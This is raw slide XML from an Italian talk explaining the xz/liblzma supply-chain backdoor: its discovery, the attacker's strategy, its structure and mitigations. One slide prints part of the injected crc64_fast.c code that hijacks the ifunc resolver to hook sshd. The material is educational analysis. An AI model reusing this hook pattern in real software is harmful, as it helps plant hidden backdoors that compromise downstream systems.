            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2800">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>La scoperta di Andres Freund</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="2800">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Trade Gothic Next Light"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2800">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>La strategia di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Jia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> Tan</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="2800">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Trade Gothic Next Light"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" b="1" u="sng">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Struttura della backdoor</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="2800">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Trade Gothic Next Light"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2800">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Forme di mitigazione</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="2800">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Trade Gothic Next Light"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2800">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Cosa sappiamo oggi</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="414389450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F2AFF39-6F5A-1E50-7CDE-8AAD21C2B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167" y="3300"/>
            <a:ext cx="10524738" cy="1452552"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg2"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="4000" dirty="0"/>
              <a:t> Struttura della backdoor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A698C9B-A4EA-4166-BB4E-5F2D0E1F8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AFF03-0A74-4B45-B900-A104A13AD368}" type="datetime1">
              <a:rPr lang="it-IT"/>
              <a:t>07/06/2024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B864F53-019D-926A-DB74-BA373E3FA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83DB1B8-299C-899A-BCC9-0785B184C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77</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="37" name="Segnaposto contenuto 36" descr="Immagine che contiene schizzo, diagramma, pixel&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6400CFC6-8C27-B738-B0F7-BEBC02B5C7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433" y="7285"/>
            <a:ext cx="1676961" cy="1453403"/>
          </a:xfr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C584BB4A-FACA-4161-5F39-9ECB562902C0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="138548" y="1926415"/>
            <a:ext cx="3276058" cy="470898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800" b="1" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Snippet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> iniezione </a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>in crc64_fast.c</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="2800" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Sono evidenziate le funzioni nuove introdotte.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Lo scopo è l'installazione di un </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>audit hook</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> su </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sshd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>La backdoor "si pone in ascolto" per eventuali connessioni.</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill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8384C0AA-7538-0FC0-8C70-EEE4217BF247}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3603579" y="1605447"/>
            <a:ext cx="8023411" cy="533992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100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t># 0 "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>path</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>/to/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>liblzma</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>/check/crc64_fast.c"
...
#if </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>defined</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>(CRC_X86_CLMUL)
#   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>define</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> BUILDING_CRC64_CLMUL
#   include "crc_x86_clmul.h"
#endif
#if </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>defined</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>(CRC32_GENERIC) &amp;&amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>defined</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>(CRC64_GENERIC) &amp;&amp; \
    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>defined</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>(CRC_X86_CLMUL) &amp;&amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>defined</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>(CRC_USE_IFUNC) &amp;&amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>defined</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>(PIC) &amp;&amp; \
    (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>defined</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>(BUILDING_CRC64_CLMUL) || </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>defined</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>(BUILDING_CRC32_CLMUL))
</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>extern</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="11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it-IT" sz="1100" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="11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it-IT" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>get_cpuid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>void</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>*, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>void</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>*, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>void</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>*, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>void</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>*, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>void</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>*);
</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>static</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="11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it-IT" sz="1100" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>inline</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="11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it-IT" sz="1100" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>bool</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="11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it-IT" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>is_arch_extension_supported</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>void</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>) {
    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> success = 1;
    uint32_t r[4];
    success = _</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>get_cpuid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>(1, &amp;r[0], &amp;r[1], &amp;r[2], &amp;r[3], ((</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>char</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>*) __</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>builtin_frame_address</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>(0))-16);
    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>const</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> uint32_t </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>ecx_mask</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> = (1 &lt;&lt; 1) | (1 &lt;&lt; 9) | (1 &lt;&lt; 19);
    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>return</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> success &amp;&amp; (r[2] &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>ecx_mask</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>) == </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>ecx_mask</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>;
}
#else
#define _</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>is_arch_extension_supported</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="11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it-IT" sz="1100" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>is_arch_extension_supported</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>
#endif
...
</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>static</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> crc64_func_type
</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>crc64_resolve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>void</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>)
{
    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
